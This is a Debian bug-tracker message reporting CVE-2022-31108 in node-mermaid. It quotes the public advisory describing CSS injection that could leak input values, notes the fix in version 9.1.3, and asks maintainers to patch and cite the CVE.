[Pkg-javascript-devel] Bug#1014540: node-mermaid: CVE-2022-31108

[Moritz Mühlenhoff]

Source: node-mermaid
X-Debbugs-CC: team at security.debian.org
Severity: important
Tags: security

Hi,

The following vulnerability was published for node-mermaid.

CVE-2022-31108[0]:
| Mermaid is a JavaScript based diagramming and charting tool that uses
| Markdown-inspired text definitions and a renderer to create and modify
| complex diagrams. An attacker is able to inject arbitrary `CSS` into
| the generated graph allowing them to change the styling of elements
| outside of the generated graph, and potentially exfiltrate sensitive
| information by using specially crafted `CSS` selectors. The following
| example shows how an attacker can exfiltrate the contents of an input
| field by bruteforcing the `value` attribute one character at a time.
| Whenever there is an actual match, an `http` request will be made by
| the browser in order to "load" a background image that will let an
| attacker know what's the value of the character. This issue may lead
| to `Information Disclosure` via CSS selectors and functions able to
| generate HTTP requests. This also allows an attacker to change the
| document in ways which may lead a user to perform unintended actions,
| such as clicking on a link, etc. This issue has been resolved in
| version 9.1.3. Users are advised to upgrade. Users unable to upgrade
| should ensure that user input is adequately escaped before embedding
| it in CSS blocks.

https://github.com/mermaid-js/mermaid/security/advisories/GHSA-x3vm-38hw-55wf
https://github.com/mermaid-js/mermaid/commit/0ae1bdb61adff1cd485caff8c62ec6b8ac57b225

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2022-31108
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31108

Please adjust the affected versions in the BTS as needed.